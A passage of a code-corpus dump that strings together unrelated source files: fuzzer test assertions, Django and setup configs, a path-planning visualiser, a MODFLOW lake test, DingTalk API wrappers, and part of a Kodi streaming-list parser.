raise Exception()
def assert_crash(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.CRASH:
utils.msg("[-] ERROR: Returned status was not CRASH")
raise Exception()
def assert_exception(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.EXCEPTION_THROWN and result.status != executor.Execution_Status.EXCEPTION_CRASH:
utils.msg("[-] ERROR: Returned status was not EXCEPTION")
raise Exception()
def assert_timeout(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.TIMEOUT:
utils.msg("[-] ERROR: Returned status was not TIMEOUT")
raise Exception()
def assert_output_equals(result, expected_output):
global number_performed_tests
number_performed_tests += 1
if result.output.strip() != expected_output.strip():
utils.msg("[-] ERROR: Returned output (%s) was not correct (%s)" % (result.output.strip(), expected_output))
raise Exception()
def execute_program(code_to_execute):
cfg.exec_engine.restart_engine()
result = cfg.exec_engine.execute_safe(code_to_execute)
return result
def restart_exec_engine():
cfg.exec_engine.restart_engine()
def execute_program_from_restarted_engine(code_to_execute):
restart_exec_engine()
return execute_program(code_to_execute)
def assert_int_value_equals(value_real, value_expected, error_msg):
global number_performed_tests
number_performed_tests += 1
if value_real == value_expected:
return # Test PASSED
utils.msg("[-] ERROR: %s (expected: %d ,real: %d)" % (error_msg, value_expected, value_real))
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_string_value_equals(string_real, string_expected, error_msg):
global number_performed_tests
number_performed_tests += 1
if string_real == string_expected:
return # Test PASSED
print("[-] ERROR: %s (expected: %s ,real: %s)" % (error_msg, string_expected, string_real))
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_no_new_coverage(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges == 0:
return # test PASSED
print("[-] ERROR: Found new coverage (%d) but expected that there is no new coverage!" % result.num_new_edges)
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_new_coverage(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges != 0:
return # test PASSED
print("[-] ERROR: Found no new coverage but there should be one!")
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
# The expect functions don't throw an exception like the assert_* functions
# Instead, they just count how often the expected result was true
def expect_no_new_coverage(result):
global expectations_correct, expectations_wrong, number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges == 0:
expectations_correct += 1
else:
expectations_wrong += 1
# The expect functions don't throw an exception like the assert_* functions
# Instead, they just count how often the expected result was true
def expect_new_coverage(result):
global expectations_correct, expectations_wrong, number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges != 0:
expectations_correct += 1
else:
expectations_wrong += 1
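# Illustrative usage sketch (assumes cfg.exec_engine was initialised by the fuzzer's setup code):
#
#     result = execute_program("var x = 1 + 1;")
#     assert_success(result)
#     expect_no_new_coverage(result)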
| 2.40625 | 2 |
examples/my_configs/two.py | davidhyman/override | 0 | 7846 | <filename>examples/my_configs/two.py
from .one import *
fruit = 'banana'
colour = 'orange'
sam['eggs'] = 'plenty'
sam.pop('ham')
| 1.742188 | 2 |
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | 0 | 7847 | <filename>students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework.routers import DefaultRouter
from .views import NoteViewSet
app_name = 'api'
router = DefaultRouter(trailing_slash=False)
router.register('notes', NoteViewSet)
urlpatterns = [
path('jwt-auth/', obtain_jwt_token),
path('', include(router.urls)),
]
| 1.78125 | 2 |
PathPlanning/run.py | CandleStein/VAlg | 0 | 7848 | from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
if drawing == True:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
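# Example invocations (run from this directory so planning_framework is importable):
#   python run.py -n 2    # A* with heuristic weight 2 (the default)
#   python run.py -n 0    # Dijkstra's algorithm, as noted in the --n_heuristic help text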
| 2.984375 | 3 |
Codeforces/problems/0136/A/136A.py | object-oriented-human/competitive | 2 | 7849 | <gh_stars>1-10
n = int(input())
line = list(map(int, input().split()))
l = {}
res = ""
for i, j in enumerate(line):
l[j] = i+1
for k in range(n):
res += str(l[k+1]) + " "
print(res.rstrip())
| 2.875 | 3 |
generatey.py | YiLisa/DSCI560-hw2 | 0 | 7850 | <filename>generatey.py
import pandas as pd
def main():
input = pd.read_csv('random_x.csv', header=None)
x=input[0].tolist()
y = []
for n in x:
y.append(3*int(n)+6)
df = pd.DataFrame(y)
df.to_csv('output_y.csv', index=False, header=False)
if __name__ == '__main__':
main()
    print('generating y = 3x+6...')
| 3.453125 | 3 |
setup.py | burn874/mtg | 0 | 7851 | import re
from pkg_resources import parse_requirements
import pathlib
from setuptools import find_packages, setup
README_FILE = 'README.md'
REQUIREMENTS_FILE = 'requirements.txt'
VERSION_FILE = 'mtg/_version.py'
VERSION_REGEXP = r'^__version__ = \'(\d+\.\d+\.\d+)\''
r = re.search(VERSION_REGEXP, open(VERSION_FILE).read(), re.M)
if r is None:
raise RuntimeError(f'Unable to find version string in {VERSION_FILE}.')
version = r.group(1)
long_description = open(README_FILE, encoding='utf-8').read()
install_requires = [str(r) for r in parse_requirements(open(REQUIREMENTS_FILE, 'rt'))]
setup(
name='mtg',
version=version,
description='mtg is a collection of data science and ml projects for Magic:the Gathering',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/RyanSaxe/mtg',
packages=find_packages(),
install_requires=install_requires,
)
| 1.984375 | 2 |
avilla/core/resource/interface.py | RF-Tar-Railt/Avilla | 0 | 7852 | <filename>avilla/core/resource/interface.py
from __future__ import annotations
from dataclasses import dataclass
from avilla.core.platform import Base
from avilla.core.resource import Resource, ResourceProvider
@dataclass
class ResourceMatchPrefix:
resource_type: type[Resource]
keypath: str | None = None
platform: Base | None = None
class ResourceInterface:
providers: dict[ResourceMatchPrefix, ResourceProvider]
def __init__(self):
self.providers = {}
def register(
self,
resource_type: type[Resource],
provider: ResourceProvider,
*,
mainline_keypath: str | None = None,
platform: Base | None = None,
):
self.providers[ResourceMatchPrefix(resource_type, mainline_keypath, platform)] = provider
def get_provider(
self,
resource: Resource | type[Resource],
*,
mainline_keypath: str | None = None,
platform: Base | None = None,
) -> ResourceProvider | None:
resource_type = resource if isinstance(resource, type) else type(resource)
for prefix in self.providers:
if all((
prefix.resource_type is resource_type,
prefix.keypath == mainline_keypath if prefix.keypath is not None else True,
prefix.platform == platform if prefix.platform is not None else True
)):
return self.providers[prefix]
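# Illustrative usage sketch (`ImageResource` and `image_provider` are hypothetical placeholders
# for a concrete Resource subclass and ResourceProvider implementation):
#
#     interface = ResourceInterface()
#     interface.register(ImageResource, image_provider)
#     provider = interface.get_provider(ImageResource)   # -> image_provider, or None if unregistered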
| 2.3125 | 2 |
viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | 0 | 7853 | <filename>viewer_examples/plugins/median_filter.py
from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin
def median_filter(image, radius):
return median(image, selem=disk(radius))
image = data.coins()
viewer = ImageViewer(image)
plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()
viewer += plugin
viewer.show()
| 2.3125 | 2 |
autotest/test_gwf_buy_lak01.py | scharlton2/modflow6 | 3 | 7854 | <gh_stars>1-10
# Test the buoyancy package and the variable density flows between the lake
# and the gwf model. This model has 4 layers and a lake incised within it.
# The model is transient and has heads in the aquifer higher than the initial
# stage in the lake. As the model runs, the lake and aquifer equalize and
# should end up at the same level. The test ensures that the initial and
# final water volumes in the entire system are the same. There are three
# different cases:
# 1. No buoyancy package
# 2. Buoyancy package with lake and aquifer density = 1000.
# 3. Buoyancy package with lake and aquifer density = 1024.5
import os
import pytest
import sys
import numpy as np
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework
from simulation import Simulation
ex = ["buy_lak_01a"] # , 'buy_lak_01b', 'buy_lak_01c']
buy_on_list = [False] # , True, True]
concbuylist = [0.0] # , 0., 35.]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
def build_model(idx, dir):
lx = 7.0
lz = 4.0
nlay = 4
nrow = 1
ncol = 7
nper = 1
delc = 1.0
delr = lx / ncol
delz = lz / nlay
top = 4.0
botm = [3.0, 2.0, 1.0, 0.0]
perlen = [10.0]
nstp = [50]
tsmult = [1.0]
Kh = 1.0
Kv = 1.0
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
nouter, ninner = 700, 300
hclose, rclose, relax = 1e-8, 1e-6, 0.97
name = ex[idx]
# build MODFLOW 6 files
ws = dir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create gwf model
gwfname = "gwf_" + name
gwf = flopy.mf6.ModflowGwf(sim, modelname=gwfname, newtonoptions="NEWTON")
imsgwf = flopy.mf6.ModflowIms(
sim,
print_option="ALL",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="NONE",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
filename="{}.ims".format(gwfname),
)
idomain = np.full((nlay, nrow, ncol), 1)
idomain[0, 0, 1:6] = 0
idomain[1, 0, 2:5] = 0
idomain[2, 0, 3:4] = 0
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=top,
botm=botm,
idomain=idomain,
)
# initial conditions
strt = np.zeros((nlay, nrow, ncol), dtype=float)
strt[0, 0, :] = 3.5
strt[1, 0, :] = 3.0
strt[1, 0, 1:6] = 2.5
strt[2, 0, :] = 2.0
strt[3, 0, :] = 1.0
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf,
xt3doptions=False,
save_flows=True,
save_specific_discharge=True,
icelltype=1,
k=Kh,
k33=Kv,
)
sto = flopy.mf6.ModflowGwfsto(gwf, sy=0.3, ss=0.0, iconvert=1)
c = concbuylist[idx]
lake_dense = 1000.0 + 0.7 * c
buy_on = buy_on_list[idx]
if buy_on:
pd = [(0, 0.7, 0.0, "none", "none")]
buy = flopy.mf6.ModflowGwfbuy(
gwf, packagedata=pd, denseref=1000.0, concentration=c
)
nlakeconn = 11 # note: number of connections for this lake
# pak_data = [lakeno, strt, nlakeconn, dense, boundname]
pak_data = [(0, 2.25, nlakeconn, lake_dense)]
connlen = delr / 2.0
connwidth = delc
bedleak = "None"
con_data = [
# con_data=(lakeno,iconn,(cellid),claktype,bedleak,belev,telev,connlen,connwidth )
(0, 0, (0, 0, 0), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 1, (1, 0, 1), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 2, (1, 0, 1), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 3, (2, 0, 2), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 4, (2, 0, 2), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 5, (3, 0, 3), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 6, (2, 0, 4), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 7, (2, 0, 4), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 8, (1, 0, 5), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 9, (1, 0, 5), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 10, (0, 0, 6), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
]
# period data
p_data = [
(0, "STATUS", "ACTIVE"),
]
# note: for specifying lake number, use fortran indexing!
fname = "{}.lak.obs.csv".format(gwfname)
lak_obs = {
fname: [
("lakestage", "stage", 1),
("lakevolume", "volume", 1),
("lak1", "lak", 1, 1),
("lak2", "lak", 1, 2),
("lak3", "lak", 1, 3),
("lak4", "lak", 1, 4),
("lak5", "lak", 1, 5),
("lak6", "lak", 1, 6),
("lak7", "lak", 1, 7),
("lak8", "lak", 1, 8),
("lak9", "lak", 1, 9),
("lak10", "lak", 1, 10),
("lak11", "lak", 1, 11),
],
# "digits": 10,
}
lak = flopy.mf6.modflow.ModflowGwflak(
gwf,
save_flows=True,
print_input=True,
print_flows=True,
print_stage=True,
stage_filerecord="{}.lak.bin".format(gwfname),
budget_filerecord="{}.lak.bud".format(gwfname),
nlakes=len(pak_data),
ntables=0,
packagedata=pak_data,
pname="LAK-1",
connectiondata=con_data,
perioddata=p_data,
observations=lak_obs,
auxiliary=["DENSITY"],
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(gwfname),
head_filerecord="{}.hds".format(gwfname),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
)
return sim, None
def eval_results(sim):
print("evaluating results...")
# calculate volume of water and make sure it is conserved
name = ex[sim.idxsim]
gwfname = "gwf_" + name
fname = gwfname + ".lak.bin"
fname = os.path.join(sim.simpath, fname)
assert os.path.isfile(fname)
bobj = flopy.utils.HeadFile(fname, text="STAGE")
stage = bobj.get_alldata().flatten()
# print(stage)
fname = gwfname + ".hds"
fname = os.path.join(sim.simpath, fname)
assert os.path.isfile(fname)
hobj = flopy.utils.HeadFile(fname)
head = hobj.get_data()
# print(head)
# calculate initial water volume
v0 = 3.5 * 2 # outermost columns
v0 += 2.5 * 2 # next innermost columns
v0 += 2.0 * 2 # next innermost columns
v0 += 1.0 * 1 # middle column
v0 = v0 * 0.3 # specific yield
v0 = v0 + (2.25 - 2.0) * 2 + (2.25 - 1.0)
print("initial volume of water in model = {}".format(v0))
# calculate ending water volume in model
h = head[0, 0, 0]
s = stage[-1]
v = h * 4 + 2.0 * 2 + 1.0 * 1
v = v * 0.3 # specific yield
v = v + (s - 2.0) * 2 + (s - 1.0)
print("final volume of water in model = {}".format(v))
# check to make sure starting water volume same as equalized final volume
errmsg = "initial and final water volume not equal: {} {}".format(v0, v)
assert np.allclose(v0, v)
# todo: add a better check of the lake concentrations
# assert False
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# initialize testing framework
test = testing_framework()
# build the model
test.build_mf6_models(build_model, idx, dir)
# run the test model
test.run_mf6(Simulation(dir, exfunc=eval_results, idxsim=idx))
def main():
# initialize testing framework
test = testing_framework()
# run the test model
for idx, dir in enumerate(exdirs):
test.build_mf6_models(build_model, idx, dir)
sim = Simulation(dir, exfunc=eval_results, idxsim=idx)
test.run_mf6(sim)
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 2.484375 | 2 |
lesson-08/roll_dice_v1.0.py | hemiaoio/pylearning | 1 | 7855 | """
功能:模拟掷骰子
版本:1.0
"""
import random
def roll_dice():
roll = random.randint(1, 6)
return roll
def main():
total_times = 100000
result_list = [0] * 6
for i in range(total_times):
roll = roll_dice()
result_list[roll-1] += 1
for i, x in enumerate(result_list):
        print('Face {}: count {}, frequency {}'.format(i+1, x, x/total_times))
print(result_list)
if __name__ == '__main__':
main()
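# Sanity check: with 100,000 simulated rolls, each face should occur with a frequency close to 1/6 (about 0.1667).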
| 3.703125 | 4 |
composer/dataflow-python3/main.py | gxercavins/gcp-snippets | 2 | 7856 | <filename>composer/dataflow-python3/main.py
import argparse
import logging
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
def run(argv=None, save_main_session=True):
"""Dummy pipeline to test Python3 operator."""
parser = argparse.ArgumentParser()
known_args, pipeline_args = parser.parse_known_args(argv)
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
# Just a simple test
p | 'Create Events' >> beam.Create([1, 2, 3])
result = p.run()
result.wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
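# Example invocations (standard Apache Beam pipeline options, shown only as a hint):
#   python main.py                                  # local run with the DirectRunner
#   python main.py --runner=DataflowRunner --project=<gcp-project> \
#       --region=<region> --temp_location=gs://<bucket>/tmp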
| 2.09375 | 2 |
dingtalk/message/conversation.py | kangour/dingtalk-python | 88 | 7857 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/11/30 下午3:02
# @Author : Matrix
# @Github : https://github.com/blackmatrix7/
# @Blog : http://www.cnblogs.com/blackmatrix/
# @File : messages.py
# @Software: PyCharm
import json
from ..foundation import *
from json import JSONDecodeError
__author__ = 'blackmatrix'
__all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress']
@dingtalk_resp
def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False):
try:
msgcontent = json.dumps(msgcontent)
    except (TypeError, ValueError):
        # If msgcontent cannot be serialised to JSON, pass it through to DingTalk as-is and let
        # DingTalk handle it (json.dumps raises TypeError/ValueError on failure, not JSONDecodeError).
        pass
if not isinstance(userid_list, str):
userid_list = ','.join(userid_list)
args = locals().copy()
payload = {}
    # Assemble the request parameters
for k, v in args.items():
if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'):
if v is not None:
payload.update({k: v})
resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload)
return resp
@dingtalk_resp
def get_msg_send_result(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
@dingtalk_resp
def get_msg_send_progress(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
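# Illustrative usage sketch (the access token, agent id, user ids and task id are placeholders):
#
#     resp = async_send_msg(access_token, msgtype='text', agent_id=123456,
#                           msgcontent={'content': 'hello'}, userid_list=['user1', 'user2'])
#     result = get_msg_send_result(access_token, agent_id=123456, task_id=task_id)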
if __name__ == '__main__':
pass
| 1.84375 | 2 |
backend/garpix_page/setup.py | griviala/garpix_page | 0 | 7858 | <reponame>griviala/garpix_page<filename>backend/garpix_page/setup.py
from setuptools import setup, find_packages
from os import path
here = path.join(path.abspath(path.dirname(__file__)), 'garpix_page')
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='garpix_page',
version='2.23.0',
description='',
long_description=long_description,
url='https://github.com/garpixcms/garpix_page',
author='Garpix LTD',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(exclude=['testproject', 'testproject.*']),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
include_package_data=True,
zip_safe=False,
install_requires=[
'Django >= 1.11',
'django-polymorphic-tree-for-garpix-page >= 2.1.1',
'django-modeltranslation >= 0.16.2',
'django-multiurl >= 1.4.0',
'djangorestframework >= 3.12.4',
'garpix_utils >= 1.4.0',
'django-tabbed-admin >= 1.0.4',
'model-bakery >= 1.4.0'
],
)
| 1.328125 | 1 |
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py | C6SUMMER/allinclusive-kodi-pi | 0 | 7859 | # -*- coding: utf-8 -*-
""" p2p-streams (c) 2014 enen92 fightnight
This file contains the livestream addon engine. It is mostly based on divingmule work on livestreams addon!
Functions:
xml_lists_menu() -> main menu for the xml list category
addlista() -> add a new list. It'll ask for local or remote and processes the given input
remove_list(name) -> Remove a list
get_groups(url) -> First regex function to parse a given list. Sopcast type list
get_channels(name,url) -> Second regex function to parse a given list. Used to general livestreams xml type lists
getData(url,fanart) -> Get the item data such as iconimage, fanart, etc
getChannelItems(name,url,fanart) -> Function to grab the channel items
getItems(items,fanart) -> Function to grab the items from the xml
removeNonAscii(s) -> Function to remove non-ascii characters from the list
getSoup(url) -> uses beautifulsoup to parse a remote xml
addon_log(string) -> Simple log/print function
getRegexParsed(regexs, url) -> parse the regex expression
list_type(url) -> Checks if the list is xml or m3u
parse_m3u(url) -> Parses a m3u type list
"""
import urllib,urllib2,re,xbmcplugin,xbmcgui,xbmc,xbmcaddon,HTMLParser,time,datetime,os,xbmcvfs,sys
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
from peertopeerutils.pluginxbmc import *
from peertopeerutils.webutils import *
from peertopeerutils.directoryhandle import *
from peertopeerutils.iofile import *
"""
Main Menu
"""
def xml_lists_menu():
if settings.getSetting('sopcast-oficial') == "true":
addDir(translate(40116),"http://sopcast.org/chlist.xml",101,addonpath + art + 'xml_list_sopcast.png',2,True)
try:
if os.path.exists(os.path.join(pastaperfil,"Lists")):
dirs, files = xbmcvfs.listdir(os.path.join(pastaperfil,"Lists"))
for file in files:
f = open(os.path.join(pastaperfil,"Lists",file), "r")
string = f.read()
if xbmcvfs.exists(os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))):addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True,fan_art=os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg')))
else: addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True)
except: pass
addDir(translate(40121),MainURL,107,addonpath + art + 'plus-menu.png',2,False)
#xbmc.executebuiltin("Container.SetViewMode(51)")
"""
Add a new list function
"""
def addlista():
opcao= xbmcgui.Dialog().yesno(translate(40000), translate(40123),"","",translate(40124),translate(40125))
if opcao:
dialog = xbmcgui.Dialog()
lista_xml = dialog.browse(int(1), translate(40186), 'myprograms','.xml|.m3u')
keybdois = xbmc.Keyboard("", translate(40130))
keybdois.doModal()
if (keybdois.isConfirmed()):
searchname = keybdois.getText()
if searchname=='': sys.exit(0)
encode=urllib.quote(searchname)
if xbmcvfs.exists(os.path.join(pastaperfil,"Lists")): pass
else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists"))
txt_name = searchname + ".txt"
save(os.path.join(pastaperfil,"Lists",txt_name),lista_xml)
mensagemok(translate(40000),translate(40129))
xbmc.executebuiltin("XBMC.Container.Refresh")
else:
keyb = xbmc.Keyboard("", translate(40127))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
if search=='': sys.exit(0)
if "dropbox" in search and not "?dl=1" in search: search = search + '?dl=1'
if "xml" not in search.split(".")[-1] and "m3u" not in search.split(".")[-1]: mensagemok(translate(40000),translate(40128)); sys.exit(0)
else:
try:
code = get_page_source(search)
except:
mensagemok(translate(40000),translate(40128))
sys.exit(0)
keybdois = xbmc.Keyboard("", translate(40130))
keybdois.doModal()
if (keybdois.isConfirmed()):
searchname = keybdois.getText()
if searchname=='': sys.exit(0)
encode=urllib.quote(searchname)
if os.path.exists(os.path.join(pastaperfil,"Lists")): pass
else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists"))
txt_name = searchname + ".txt"
save(os.path.join(pastaperfil,"Lists",txt_name),search)
mensagemok(translate(40000),translate(40129))
xbmc.executebuiltin("XBMC.Container.Refresh")
"""
Remove a List
"""
def remove_list(name):
xbmcvfs.delete(name)
xbmc.executebuiltin("Notification(%s,%s,%i,%s)" % (translate(40000), translate(40150), 1,addonpath+"/icon.png"))
xbmc.executebuiltin("Container.Refresh")
"""
Parsing functions
"""
def list_type(url):
ltype = url.split('.')[-1]
if 'xml' in ltype: get_groups(url)
elif 'm3u' in ltype: parse_m3u(url)
else: pass
def parse_m3u(url):
if "http" in url: content = get_page_source(url)
else: content = readfile(url)
match = re.compile('#EXTINF:.+?,(.*?)\n(.*?)(?:\r|\n)').findall(content)
for channel_name,stream_url in match:
if 'plugin://' in stream_url:
stream_url = 'XBMC.RunPlugin('+stream_url+')'
addDir(channel_name,stream_url,106,'',1,False)
elif 'sop://' in stream_url:
addDir(channel_name,stream_url,2,'',1,False)
elif ('acestream://' in stream_url) or ('.acelive' in stream_url) or ('.torrent' in stream_url):
addDir(channel_name,stream_url,1,'',1,False)
else: addLink(channel_name,stream_url,'')
def get_groups(url):
from xml.etree import ElementTree
try:
print("Sopcast xml-type list detected")
if "http" in url:
source = get_page_source(url)
save(os.path.join(pastaperfil,"working.xml"),source)
workingxml = os.path.join(pastaperfil,"working.xml")
else:
workingxml = url
groups = ElementTree.parse(workingxml).findall('.//group')
unname_group_index = 1
LANGUAGE = "en"
for group in groups:
if group.attrib[LANGUAGE] == "":
group.attrib[LANGUAGE] = str(unname_group_index)
unname_group_index = unname_group_index + 1
if re.sub('c','e',LANGUAGE) == LANGUAGE:
OTHER_LANG = re.sub('e','c',LANGUAGE)
else:
OTHER_LANG = re.sub('c','e',LANGUAGE)
if LANGUAGE == "cn":
try:
if len(group.attrib[OTHER_LANG]) > 0:
group.attrib[LANGUAGE] = group.attrib[OTHER_LANG]
unname_group_index = unname_group_index - 1
except:
pass
if (group.find('.//channel')==None): continue
group_name=group.attrib[LANGUAGE]
try:
addDir_livestreams_common(group_name,url,102,addonpath + art + 'xml_list_sopcast.png',True)
except: pass
#xbmc.executebuiltin("Container.SetViewMode(51)")
except:
print("Other type of xml list")
getData(url,"")
def get_channels(name,url):
from xml.etree import ElementTree
if url.startswith('http://'):
source = get_page_source(url)
else:
source = readfile(url)
save(os.path.join(pastaperfil,"working.xml"),source)
chlist_tree = ElementTree.parse(os.path.join(pastaperfil,"working.xml"))
LANGUAGE = "en"
groups = ElementTree.parse(os.path.join(pastaperfil,"working.xml")).findall('.//group')
for group in groups:
if group.attrib[LANGUAGE].encode('utf-8') == name:
channels = group.findall('.//channel')
for channel in channels:
try:
try:
title = channel.find('.//name').attrib['en'].encode('utf-8')
except: title = ''
if not title:
